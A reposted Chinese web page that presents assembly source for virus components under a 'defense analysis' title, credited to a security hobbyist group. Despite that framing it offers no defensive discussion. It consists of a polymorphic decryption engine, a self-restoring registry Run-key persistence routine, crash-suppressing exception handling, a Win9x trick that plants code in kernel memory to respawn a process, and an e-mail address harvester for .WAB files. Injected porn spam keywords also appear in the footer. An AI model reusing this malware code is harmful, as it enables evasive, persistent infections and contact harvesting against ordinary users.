1. <th id="osa2k"><track id="osa2k"></track></th>
        <rp id="osa2k"><strike id="osa2k"><u id="osa2k"></u></strike></rp>
        首頁 > 編程 > Java > 正文

        病毒源碼解析之防御分析

        2019-09-06 23:33:18
        字體:
        來源:轉載
        供稿:網友
        1、超級病毒變形引擎

        此段代碼會在DATA段內生成一個解密代碼。

        .586p
        .model flat,STDCALL
        extrn ExitProcess: proc
        VirusSize=100h
        .data

        DecodeMethod dd ?
        DeCode:
        pushad
        call Encode
        db 100h dup(11h)
        Encode:
        db 100h dup(0cch)
        RndReg0 dd 0 ;eax
        RndReg1 dd 0 ;ebx
        RndCode dd 0 ;Rnd Code
        RndMima dd 60932561 ;Rnd Password

        .code
        @@Start:
        mov eax,RndMima
        ror eax,7
        mov RndCode,eax

        mov eax,RndCode
        mov ecx,eax
        and eax,011b
        mov RndReg0,eax
        xor ecx,RndMima
        and ecx,011b
        cmp eax,ecx
        jnz short ChooseRegOk
        inc ecx
        and ecx,011b
        ChooseRegOk:
        mov RndReg1,ecx


        mov edi,offset Encode

        ror RndCode,1
        call GetBxCode,0,RndReg0,RndCode
        mov esi,eax
        ContFillStep0:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep0
        dec edi

        ror RndCode,1
        call GetBxCode,1,RndReg1,RndCode
        mov esi,eax
        ContFillStep1:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep1
        dec edi

        mov ebx,edi ;//計算機Jmp指令用

        ror RndCode,1
        call GetBxCode,2,RndReg0,RndCode
        mov esi,eax
        ContFillStep2:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep2
        dec edi

        mov eax,RndMima
        mov [edi-4],eax ;//填寫隨機密碼
        mov eax,RndCode
        and eax,01
        mov DecodeMethod,eax ;//填寫DeCode方法

        ror RndCode,1
        call GetBxCode,3,RndReg0,RndCode
        mov esi,eax
        ContFillStep3:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep3
        dec edi

        ror RndCode,1
        call GetBxCode,4,RndReg1,RndCode
        mov esi,eax
        ContFillStep4:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep4
        dec edi

        ror RndCode,1
        call GetBxCode,5,RndReg0,RndCode
        mov esi,eax
        ContFillStep5:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep5
        dec edi

        mov al,0c3h
        mov [edi],al ;//填寫Ret指令

        sub ebx,edi
        mov [edi-1],bl ;//填寫jmp指令

        int 3;

        jmp DeCode
        ret
        GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
        call GetBxCodeAddr
        Step0_Eax:
        mov eax,[esp]
        int 3;
        pop eax
        push eax
        int 3;
        Step0_Ebx:
        pop ebx
        push ebx
        int 3;
        push dword ptr[esp]
        pop ebx
        int 3;
        Step0_Ecx:
        mov ecx,[esp]
        int 3;
        pop ecx
        push ecx
        int 3;
        Step0_Edx:
        mov edx,[esp]
        int 3;
        mov edx,esp
        mov edx,[edx]
        int 3

        Step1_Eax:
        mov eax,VirusSize
        int 3
        sub eax,eax
        add ax,VirusSize+3081h
        sub ax,3081h
        int 3
        Step1_Ebx:
        mov ebx,VirusSize
        int 3;
        xor ebx,ebx
        or bx,VirusSize
        int 3;
        Step1_Ecx:
        sub ecx,ecx
        xor ecx,(VirusSize xor 3181h)
        xor ecx,(3181h)
        int 3;
        mov ecx,0
        and cx,VirusSize
        int 3
        Step1_Edx:
        and edx,0
        xor dx,(VirusSize-0281h)
        add dx,0281h
        int 3;
        xor edx,edx
        sub edx,(0181h-VirusSize)
        sub edx,-0181h
        int 3;

        Setp2_Eax:
        xor [eax],12345678h
        int 3
        add [eax],12345678h
        int 3
        Setp2_Ebx:
        xor [ebx],12345678h
        int 3;
        add [ebx],12345678h
        int 3;

        Setp2_Ecx:
        xor [ecx],12345678h
        int 3;
        add [ecx],12345678h
        int 3;
        Setp2_Edx:
        xor [edx],12345678h
        int 3;
        add [edx],12345678h
        int 3;
        Step3_Eax:
        add eax,4
        int 3
        inc eax
        inc eax
        inc eax
        inc eax
        int 3;
        Step3_Ebx:
        add ebx,5
        dec ebx
        int 3
        add ebx,2
        add ebx,2
        int 3;
        Step3_Ecx:
        sub ecx,-4
        int 3
        sub ecx,-5
        dec ecx
        int 3;
        Step3_Edx:
        inc edx
        sub edx,-3
        int 3
        add edx,04
        int 3;

        Step4_Eax:
        sub eax,4
        int 3
        dec eax
        dec eax
        dec eax
        sub eax,1
        int 3;
        Step4_Ebx:
        dec ebx
        sub ebx,3
        int 3;
        dec ebx
        dec ebx
        sub ebx,2
        int 3;
        Step4_Ecx:
        add cx,123
        sub cx,123+4
        int 3
        sub cx,-4
        dec cx
        sub cx,7
        int 3
        Step4_Edx:
        sub dx,2
        dec dx
        sub dx,1
        int 3
        inc edx
        sub dx,5
        int 3;
        Step5_Eax:
        jnz $
        int 3
        ja $
        int 3
        Step5_Ebx:
        jg $
        int 3
        jnb $
        int 3
        Step5_Ecx:
        jnl $
        int 3
        jnz $
        int 3
        Step5_Edx:
        ja $
        int 3
        jg $
        int 3

        GetBxCodeAddr:
        pop esi
        mov al,0cch ;//指令分割符
        mov ecx,Step
        shl ecx,1
        shl ecx,1
        add ecx,Reg ;//計算機得到的指令位置
        shl ecx,1
        and Rnd,01b
        add ecx,Rnd
        jcxz short GetBxCodeOver
        ContFindCode:
        push ecx
        ContFindCC:
        inc esi
        cmp [esi],al
        jnz ContFindCC
        pop ecx
        loop ContFindCode
        mov eax,esi
        inc eax
        ret
        GetBxCodeOver:
        mov eax,esi
        ret
        GetBxCode endp


        end @@Start


        2、Windows 9x/2000/xp 瑣定注冊表

        .586p
        .model flat,STDCALL
        .data

        HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
        ValueName db 'wap32',0
        PathName db 'wap32.exe',0

        .code

        extrn RegOpenKeyA: proc
        extrn RegSetValueExA: proc
        extrn RegCloseKey: proc
        extrn ExitProcess: proc
        extrn RegNotifyChangeKeyValue: proc
        extrn CreateThread: proc
        extrn Sleep: proc
        extrn RegQueryValueExA: proc

        start:
        push eax
        call RegOpenKeyA,080000002h,offset HKeyStr,esp
        pop ebx
        call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

        sub esp,100h
        mov eax,esp
        push 100h
        call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
        pop eax
        add esp,100h

        push eax
        call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
        pop eax
        call Sleep,1000*60*3
        ret

        RegProtectProc proc hKey:dword
        mov ebx,hKey
        sub esp,100h
        mov edi,esp
        call GetProtectKeyName
        db 'wap32',0
        GetProtectKeyName:
        pop esi
        push 100h
        call RegQueryValueExA,ebx,esi,0,0,edi,esp
        pop eax
        WaitRegChangeNotify:
        call RegNotifyChangeKeyValue,ebx,0,4,0,0
        call RegSetValueExA,ebx,esi,0,01,edi,100h
        jmp short WaitRegChangeNotify
        RegProtectProc endp

        end start



        3、 Windows 9x/2000 意外處理通用程序


        此段程序可以達到屏蔽程序錯誤的效果

        include wap32.inc

        .386p
        .model flat,stdcall

        extrn MessageBoxA: proc
        extrn ExitProcess: proc

        .data

        Msg db 'Fuck',0

        SetSehFrame: ;ecx=忽略錯誤繼續執行地址
        pop eax ;彈出返回地址
        push ecx ;保存忽略錯誤繼續執行地址
        call PushExceptionProc
        jmp short Exception
        PushExceptionProc:
        push fs:dword ptr[0]
        mov fs:[0],esp
        call GetEspAddr
        push D [edx] ;保存原Esp地址值
        mov [edx],esp
        jmp eax
        ClearSehFrame:
        pop eax ;彈出返回地址
        call GetEspAddr
        mov esp,[edx]
        pop D [edx] ;恢復原Esp地址值
        pop fs:dword ptr[0]
        pop ecx
        pop ecx ;彈出忽略錯誤繼續執行地址
        jmp eax

        Exception proc pRecord,pFrame,pContext,pDispatch
        call PushSehBackProc
        call ClearSehFrame
        jmp ecx
        PushSehBackProc:
        pop ecx
        mov eax,pContext
        mov [eax.cx_Eip],ecx
        xor eax,eax ;忽略錯誤繼續執行
        ret
        Exception endp

        GetEspAddr:
        call PushOffsetEspAddr
        dd ?
        PushOffsetEspAddr:
        pop edx
        ret


        .code

        Start:
        call PushErrorProc
        call MessageBoxA,0,offset Msg,offset Msg,0
        ret
        PushErrorProc:
        pop ecx
        call SetSehFrame
        mov ds:[0],eax
        call ClearSehFrame
        ret


        end Start



        4、Windows 9x 下進程不死術

        此段程序首先實現Win9x下注射遠程線程(新技術)
        然后與Win2k下進程不死術一樣了。
        include Win32.inc

        .386p
        .model flat,stdcall

        extrn GetProcAddress: proc
        extrn WinExec: proc
        extrn MessageBoxA: proc
        extrn Sleep: proc
        extrn GetCurrentProcessId: proc
        extrn OpenProcess: proc
        extrn GetCurrentProcess: proc
        extrn WriteProcessMemory: proc
        extrn GetExitCodeProcess: proc

        .data

        ;問題,要Sleep()這樣做使Kernel32有機會更新數據
        KnlThread proc ProcID:dword
        call GetKnlOpenProcess
        KnlOpenProcess dd ?
        GetKnlOpenProcess:
        pop eax
        call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
        or eax,eax
        jz short ExitProtectProc
        mov ebx,eax
        call GetKnlWaitForSingleObject
        KnlWaitForSingleObject dd ?
        GetKnlWaitForSingleObject:
        pop eax
        call [eax],ebx,-1h
        call GetFileNameAddress
        GetFileNameAddress:
        pop ecx
        add ecx,offset FileName-offset GetFileNameAddress
        call GetKnlWinExec
        KnlWinExec dd ?
        GetKnlWinExec:
        pop eax
        call [eax],ecx,01
        ExitProtectProc:
        ret
        KnlThread endp

        FileName db 'c:wap32.exe',0

        KnlOpenProcessStr db 'OpenProcess',0
        KnlWaitForObjectStr db 'WaitForSingleObject',0
        KnlWinExecStr db 'WinExec',0
        KnlSleepStr db 'Sleep',0
        KnlCreateKnlThreadStr db 'CreateKernelThread',0

        .code

        Start:
        call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
        mov KnlOpenProcess,eax
        call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
        mov KnlWaitForSingleObject,eax
        call GetProcAddress,0bff70000h,offset KnlWinExecStr
        mov KnlWinExec,eax

        call MoveDataToKnl,offset Start,0bff70600h,100h

        call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
        mov ebx,eax
        call GetCurrentProcessId
        push eax
        call ebx,0,0,0bff70000h+600h,eax,0,esp
        pop eax
        call MessageBoxA,0,offset FileName,offset FileName,0
        ret

        MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
        push eax
        sidt [esp-2]
        pop eax
        add eax,3*8
        mov ebx,[eax]
        mov edx,[eax+4]
        call SetIdt03
        pushad
        mov [eax],ebx
        mov [eax+4],edx
        cld
        rep movsb
        popad
        iret
        SetIdt03:
        cli
        pop W[eax]
        pop W[eax+6]
        mov esi,Src
        mov edi,Des
        mov ecx,nCx
        int 3;
        sti
        ret
        MoveDataToKnl endp

        end Start


        5、簡單算法,高效率壓縮PE文件

        .586p
        .model flat,STDCALL
        .data

        OldFile db 'pe.exe',0
        NewFile db 'pe.zzz',0

        FileData db 0,0
        .code
        extrn _lopen: proc,_lcreat: proc
        extrn _lread: proc,_lwrite: proc
        extrn _lclose: proc
        extrn ExitProcess: proc
        start:
        call _lopen,offset OldFile,0
        cmp eax,-1
        jz ExitProc
        mov esi,eax
        call _lcreat,offset NewFile,0
        cmp eax,-1
        jz CloseOldFile
        mov edi,eax

        xor ebx,ebx
        ReadData:
        call _lread,esi,offset FileData,1
        or eax,eax
        jz short ReadOver
        movzx eax,FileData
        or eax,eax
        jnz short NoZero
        inc ebx
        cmp ebx,0ffh
        jnz short ReadData
        xor eax,eax
        mov ah,bl
        xchg ax,word ptr FileData
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        jmp short ReadData
        NoZero:
        or ebx,ebx
        jnz short NoZeroData
        call _lwrite,edi,offset FileData,1
        jmp short ReadData
        NoZeroData:
        push eax
        xor eax,eax
        mov ah,bl
        mov word ptr FileData,ax
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        pop eax
        mov FileData,al
        call _lwrite,edi,offset FileData,1
        jmp ReadData
        ReadOver:
        or ebx,ebx
        jz short CloseFile
        xor eax,eax
        mov ah,bl
        xchg ax,word ptr FileData
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        CloseFile:
        call _lclose,edi
        CloseOldFile:
        call _lclose,esi
        ExitProc:
        call ExitProcess,0

        end start

        6、提取Windows地址薄文件(*.WAB)的Email信息

        .586p
        .model flat,STDCALL
        .data

        MailFile db 'My.WAB',0

        .code

        extrn _lopen: proc,_lcreat: proc
        extrn _lread: proc,_lwrite: proc
        extrn _llseek: proc
        extrn _lclose: proc
        extrn MessageBoxA: proc
        extrn ExitProcess: proc
        extrn WideCharToMultiByte: proc

        start:
        call _lopen,offset MailFile,0
        cmp eax,-1
        jz short ExitProc
        mov ebx,eax
        sub esp,100h
        mov edi,esp
        call _lread,ebx,edi,100h
        cmp eax,100h
        jnz short CloseFile
        mov eax,[edi+60h] ;得到Unicode郵件名偏移
        call _llseek,ebx,eax,0
        mov ecx,[edi+64h] ;得到Unicode郵件名個數
        ContWabMail:
        push ecx
        call _lread,ebx,edi,44h ;讀一個記錄
        cmp eax,44
        sub esp,100h
        mov eax,esp
        call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
        mov eax,esp
        call MessageBoxA,0,eax,eax,0
        add esp,100h
        pop ecx
        loop short ContWabMail
        CloseFile:
        call _lclose,ebx
        ExitProc:
        call ExitProcess,0

        end start



        WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
        WSS 主頁:http://www.whitecell.org/
        WSS 論壇:http://www.whitecell.org/forum/
        發表評論 共有條評論
        用戶名: 密碼:
        驗證碼: 匿名發表
        亚洲性爱高潮视频_夜夜爽一区二区三区精品_亚洲国产第一福利一区二区_久久精品亚洲国产av

            1. <th id="osa2k"><track id="osa2k"></track></th>
              <rp id="osa2k"><strike id="osa2k"><u id="osa2k"></u></strike></rp>